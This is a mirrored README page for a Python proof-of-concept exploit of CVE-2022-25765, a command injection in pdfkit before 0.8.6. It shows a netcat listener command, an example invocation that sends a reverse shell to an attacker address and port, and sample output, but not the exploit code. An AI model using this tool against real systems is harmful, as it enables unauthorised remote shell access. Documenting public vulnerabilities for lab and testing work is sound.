Giters

nikn0laty / PDFkit-CMD-Injection-CVE-2022-25765

Exploit for CVE-2022-25765 command injection in pdfkit < 0.8.6

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

PDFkit-CMD-Injection (CVE-2022-25765)

Exploit for CVE-2022-25765 command injection in pdfkit < 0.8.6

See more details about the vulnerability here

PoC

Run the netcat on your host:

$ nc -lvnp 1337

Run the exploit (example):

$ ./CVE-2022-25765.py -t http://localhost -a 10.10.14.122 -p 1337
[*] Input target address is http://localhost
[*] Input address for reverse connect is 10.10.14.122
[*] Input port is 1337
[!] Run the shell... Press Ctrl+C after successful connection

Flags:

-t, --target  Address of target in http-format
-a, --addr    Address for reverse connect
-p, --port    Port for reverse connect, 9001 by default

About

Exploit for CVE-2022-25765 command injection in pdfkit < 0.8.6

Languages

Language:Python 100.0%